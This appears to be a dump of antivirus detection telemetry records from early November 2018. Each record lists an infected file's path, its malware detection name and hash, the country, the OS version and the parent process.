  Row(detection=Row(filename='avscan-20181101-215932-282357da', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e8942c23\\AVSCAN-20181101-215651-10DC630D\\AVSCAN-20181101-215932-282357DA', filesize=1536000, name='TR/CoinMiner.CK.#M1.#R1'), hash='39cee19d7a3a27e18697f46c37fdd5277c4b22524aa0784de20a211cac399800', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:59:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='pdgenxferfsys.dll', filepath='C:\\Program Files\\Real\\RealPlayer\\Plugins\\pdgenxferfsys.dll', filesize=128000, name='W32/Ramnit.CD.#M1.#R1'), hash='4a98d471a52c6e6ace48ad5037ad7f2afe08881fab43781d2290ef802e58f2c2', metadata=Row(cmdline='--engine=2 --session-id=7+YA48EOyI7UdXiZRnMUKD9FKq42yN3uRT8hrSOq --registry-suffix=ESET --enable-crash-reporting --srt-field-trial-group-name=NewCleanerUIExperiment', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter\\35.178.200\\software_reporter_tool.exe', parentsize=12095608, timestamp='2018-11-01T08:38:32Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-172949-7a9b80db', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0219e0d6\\AVSCAN-20181101-160503-1618A0E9\\AVSCAN-20181101-172949-7A9B80DB', filesize=840000, name='TR/Miner.OA.#M1.#R1'), hash='0978fcc7db3a27e180fca68b33d99c6bbe8173054f1cd0ebfd0fe0be35667656', metadata=Row(cmdline=None, country='GE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T13:29:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='unwise.exe', filepath='G:\\PUBLICA\\Cida\\AIDF\\backup NF-e\\ARQUIVOS ANTIGOS\\Diversos\\Marcelo 23072009\\Andrea-Camila\\PASTA\\Declarações\\Dirf2006\\UNWISE.EXE', filesize=128000, name='TR/Crypt.XPACK.ilzsk.#M1.#R1'), hash='78d9a17c8ed438abba962d1bc61e851f232b0c4977775a583505710a73400c1d', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T23:03:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-002835-3a64b522', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_83a270a8\\AVSCAN-20181101-234829-DD2407AD\\AVSCAN-20181102-002835-3A64B522', filesize=1536000, name='TR/CoinMiner.CK.#M1.#R1'), hash='39cee19d7a3a27e18697f46c37fdd5277c4b22524aa0784de20a211cac399800', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T21:28:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='8396f6400c35a0c89e1e4e96d5323c173eea9a93', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\8396f6400c35a0c89e1e4e96d5323c173eea9a93', filesize=2944000, name='TR/Crypt.EPACK.Gen2.#M300.#R100627'), hash='369e82ed6d1929e1e846ac2b2cea485a8434fb4043412bf35559b4840907e760', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T13:06:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='updatewizard.exe', filepath='C:\\Program Files (x86)\\TuneUp Utilities 2010\\UpdateWizard.exe', filesize=840000, name='HEUR/AGEN.1023571.#M1.#R1'), hash='6f89e7e102f825264049fb2af1bce6683c799807cf5520697777232a3d589fd1', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T13:01:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dealplylive.exe', filepath='\\\\?\\C:\\Program Files (x86)\\DealPlyLive\\Update\\DealPlyLive.exe', filesize=148000, name='ADWARE/DealPly.Gen4.#M300.#R300171'), hash='5f456982046db60202faa8a29d13eb84860f00a648b39919dded52111b130275', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T19:32:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='passwords.exe', filepath='I:\\.Trashes\\Passwords.exe', filesize=512000, name='W32/Sality.AT.#M1.#R1'), hash='83ef079fb538f232884ca1f3c64ad14e939d3ddcf013d1089320abc77477beab', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T14:20:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa0.019\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='AU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa0.019\\Setup.exe', parentsize=1551000, timestamp='2018-11-01T20:25:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T08:48:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mhautopatch.exe', filepath='D:\\PC GAMER\\msoxh\\MHAutoPatch.exe', filesize=2560000, name='TR/Black.Gen2.#M300.#R100338'), hash='3600f95d74d3eedb693c26f0533afc0ac366bd857770711dbe9dafee1340bc5a', metadata=Row(cmdline='--engine=2 --session-id=ihtZ4b0EsS73zhHuJunhRXc9AedfryFvcJk5k2X8 --registry-suffix=ESET --extended-safebrowsing-enabled --chrome-version=70.0.3538.77 --chrome-channel=4 --srt-field-trial-group-name=NewCleanerUIExperiment', country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter\\35.177.200\\software_reporter_tool.exe', parentsize=13449336, timestamp='2018-11-01T13:49:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-204831-c0f74e69', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5c1d082d\\AVSCAN-20181101-204812-BE0B9218\\AVSCAN-20181101-204831-C0F74E69', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T19:48:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a0212024.exe', filepath='C:\\Users\\X\\Desktop\\HD\\A0212024.exe', filesize=116000, name='W32/Sality.AT.#M1.#R1'), hash='5a2b087a95d0cf17cf33b3b79472c2fb1bc06f49f2343081b879f0b80a2e23a4', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe7_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe7 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T16:12:24Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='unp35453579.tmp', filepath='C:\\Windows\\Temp\\_avg_\\unp35453579.tmp', filesize=256000, name='HEUR/Macro.Downloader.PTA.Gen.#M1.#R1'), hash='0e1eff9632773434de9b2ad925704780d4ebc43ea35a0752dfa99a45962aa812', metadata=Row(cmdline=None, country='GB', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files\\AVG\\Antivirus\\AVGSvc.exe', parentsize=325072, timestamp='2018-11-01T15:15:24Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Program Files (x86)\\Image-Line\\FL Studio 12\\Plugins\\mes vst\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\Image-Line\\FL Studio 12\\Plugins\\mes vst\\Setup.exe', parentsize=1551000, timestamp='2018-11-01T20:46:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='autoupdater.exe', filepath='C:\\MCoffline\\MCoffline\\programs\\Program Files\\loader\\Autoupdater.exe', filesize=2944000, name='W32/Neshta.A.#M1.#R1'), hash='7163430361a2a624a529c5014db1b9e654f43c4207850191223c8e6c885d2b9b', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:As6N7dGP00Kwq6vB.1', country='KZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=122536, timestamp='2018-11-01T05:34:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='panorama.dll', filepath='C:\\Program Files (x86)\\Steam\\bin\\panorama\\panorama.dll', filesize=5044000, name='TR/Crypt.XPACK.Gen3.#M300.#R200156'), hash='cf34a4e00d1ad223048cdc3a187dfcd018899f96c9b229f956b100844381e05e', metadata=Row(cmdline=None, country='SV', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T16:18:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='moduli 1-7.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\ENGIM\\DOCENZE\\INFORMATICA\\ECDL\\Moduli 1-7.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:24:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\j3zxsyh5l5n\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T00:35:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-151536-3fcc4ecc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3db4e496\\AVSCAN-20181101-145735-7096FD0F\\AVSCAN-20181101-151536-3FCC4ECC', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:15:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='documents.exe', filepath='C:\\Users\\X\\Documents\\Documents.exe', filesize=512000, name='TR/Drop.Agen.757760.#M1.#R1'), hash='8d08f3a333a6cf026bb243fada0682650b148d58949dc6a48714268893873c03', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe12_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe12 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T03:00:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='operatore di cura del paziente psichiatrico.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\chiavetta engim 2017\\MODULI ENGIM\\CORSI FORMAZIONE ADULTI\\SOCIO SANITARI\\OPERATORE DI CURA DEL PAZIENTE PSICHIATRICO.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:13:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-211005-6b24847f', filepath='\\\\?\\C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ccb5e6d0\\AVSCAN-20181101-210147-2591929C\\AVSCAN-20181101-211005-6B24847F', filesize=3904000, name='HEUR/AGEN.1033264.#M1.#R1'), hash='b90be0161709682d885171d6589758b4ed7306ecafa6694505d9cb735096c217', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:23:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mylanviewer.exe', filepath='K:\\HBCD\\Programs\\MYLANVIEWER.EXE', filesize=64000, name='TR/Siggen.64000.8.#M1.#R1'), hash='928970136fecc731176bb438d4e172a4564f71cc3e402b006f5210c251f1a380', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='K:\\HBCD\\PStart.exe', parentsize=786952, timestamp='2018-11-01T17:00:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-212206-df0f4a72', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_de0729a5\\AVSCAN-20181101-211656-B20B1D6E\\AVSCAN-20181101-212206-DF0F4A72', filesize=576000, name='TR/Dldr.Stantinko.be854f.#M1.#R1'), hash='be854f2a34ba3f398eb409c41f271270079bbd139e4bdd0f203b071e09ea0b3d', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T18:22:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maier_angelina.doc', filepath='C:\\Users\\X\\Documents\\5.1 6.1 7.1 8.1\\Deckblätter_6_1_2HJ_16_17\\Maier_Angelina.doc', filesize=64000, name='HEUR/Macro.Downloader.AMCY.Gen.#M1.#R1'), hash='eb675aa48f70eecf55150f853d736e19810d37734f58b8df62063f0ec2178729', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe23_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe23 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T16:24:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-093925-c4db79c1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_318d9040\\AVSCAN-20181101-093330-80B14946\\AVSCAN-20181101-093925-C4DB79C1', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:39:32Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\3mnufzljt0n\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:00:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='funnyvoice.exe', filepath='\\\\?\\K:\\العاب فلاش\\funnyvoice.exe', filesize=320000, name='W32/Neshta.A.#M1.#R1'), hash='8c222d3646ee2e259bff6e961f68d2821cda9804055e61d828ae0d699fd270d2', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:34:24Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-093555-9c8fcb5b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_318d9040\\AVSCAN-20181101-093330-80B14946\\AVSCAN-20181101-093555-9C8FCB5B', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:36:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='r3.exe', filepath='D:\\MAIN CROFIL DOCS SERVER 2010\\BACK UP\\NENITA GARCIA FILES\\SSS-DIFF. COMPANY\\WASHIN SSS\\SSS2010\\WASHIN  JUNE 2010\\R3.exe', filesize=2048000, name='W32/Sality.AT.#M1.#R1'), hash='95723daca81f3380fad66dd32f8c6ac8c0e57e692f6aaf1cf167c027d2ba655c', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T22:53:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='ac6ce30ef5cbfbf941c2ba98eaf1f3bf0e4bdab311c255d7ed4d6d8e3b06e917', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T06:13:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='stage nuovi moduli.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\chiavetta engim 2017\\MODULI ENGIM\\MODULI 2016-2017\\STAGE NUOVI MODULI.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:16:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\p0esq320ikr\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='BY', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T10:13:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='profiles.exe', filepath='C:\\Users\\X\\Thunder Network\\Mini_downloadlib\\ODAwMDAwNTQ=\\Version_3_2_1_48\\Profiles\\Profiles.exe', filesize=512000, name='TR/Drop.Agen.757760.#M1.#R1'), hash='8d08f3a333a6cf026bb243fada0682650b148d58949dc6a48714268893873c03', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe12_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe12 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T03:00:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='d9939b911f8555be796837fa0cc7f4eb7aefff32133d0e8457f3789965a40d5f.vir', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_27.10.2018-17.available\\Avira\\D9939B911F8555BE796837FA0CC7F4EB7AEFFF32133D0E8457F3789965A40D5F.VIR', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='d9939b911f8555be796837fa0cc7f4eb7aefff32133d0e8457f3789965a40d5f', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T09:13:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='googleupdatehelper.dll', filepath='C:\\Program Files\\Google\\Chrome\\Application\\GoogleUpdateHelper.dll', filesize=704000, name='TR/ExtenBro.uhnh.#M1.#R1'), hash='e6f548cf0961568ffb7c92bd560e87cb432ee48e0480943c68813e1194f50a72', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T06:36:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-094149-e06c6c84', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_318d9040\\AVSCAN-20181101-093330-80B14946\\AVSCAN-20181101-094149-E06C6C84', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:41:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='z8j7cvbc5.exe', filepath='\\\\?\\C:\\Program Files\\Z8J7CVBC5R\\Z8J7CVBC5.exe', filesize=832000, name='TR/Dropper.Gen.#M300.#R4133'), hash='733e354c150b4149737ae67afd29dc8e971759219779881f1f0375c6118fb5b9', metadata=Row(cmdline=None, country='ES', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T13:08:08Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='a0344296.exe', filepath='\\\\?\\J:\\System Volume Information\\_restore{EC55BFD7-BEFF-42D8-9D76-6078D4869C8B}\\RP436\\A0344296.exe', filesize=3584000, name='W32/Sality.AT.#M1.#R1'), hash='8a1b7fc5b143627da76b9a675ea56cf91e8d6c0a79c32b4035197e2ed0497987', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T09:26:12Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-092214-cf7854e2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_1683e6be\\AVSCAN-20181104-090613-498D57A5\\AVSCAN-20181104-092214-CF7854E2', filesize=640000, name='TR/AD.Nymaim.Y.#M1.#R1'), hash='0ecff4597301f023a30598c4fd03e81c408c4d51220c5ff0e7d68072194c5ee9', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T08:22:22Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp2299190\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline='\\\\\\/RSF \\\\\\/ppn:UVBkZCU1FkpATXN8xSQ \\\\\\/mnl', country='TW', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\BitF35C.tmp.exe', parentsize=2690240, timestamp='2018-11-04T10:36:45Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-04-07-39-33.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-22T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='BO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-04T20:50:06Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='d631dc24-d4f2-3299-475f-16543e3bce4f.exe', filepath='F:\\{b0730209-5404-e18b-ed79-9b531b969681}\\d631dc24-d4f2-3299-475f-16543e3bce4f.exe', filesize=256000, name='TR/Dropper.Gen.#M300.#R4148'), hash='535d6a370c11ea8999e478968994022ae16c60fb69f0fa5e76b4a6a9403f1c8f', metadata=Row(cmdline='rtp', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\SMADAV\\SMΔRTP.exe', parentsize=1879152, timestamp='2018-11-04T08:47:22Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='awsscl.dll', filepath='D:\\Program Files\\Adobe\\Acrobat 7.0\\Acrobat\\AWSSCL.dll', filesize=1408000, name='W32/Ramnit.CD.#M1.#R1'), hash='7463681b6d424c135e5d06e59a7dabcb9f622e0ed4844ba5c4e0dcd6326cf1ed', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='F:\\DesktopLayer专杀.exe', parentsize=258048, timestamp='2018-11-04T13:36:14Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='atu.exe', filepath='E:\\ATU.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='a9c1e2a015132b75d7ac1c7d38f524228e81ce54141a37eb44d7b3ba49ac70bd', metadata=Row(cmdline=None, country='GH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-04T13:56:23Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00023d66', filepath='C:\\Windows\\Temp\\bdcore_tmp\\2532\\tmp000004cb\\tmp00023d66', filesize=256000, name='HEUR/AGEN.1014173.#M1.#R1'), hash='9c4d032e352d7f2bf17d974642258620bff3144a84199019f5cbe1053932c674', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files\\Bitdefender\\Endpoint Security\\epsecurityservice.exe', parentsize=98136, timestamp='2018-11-04T20:41:39Z'), dt=datetime.date(2018, 11, 4)),
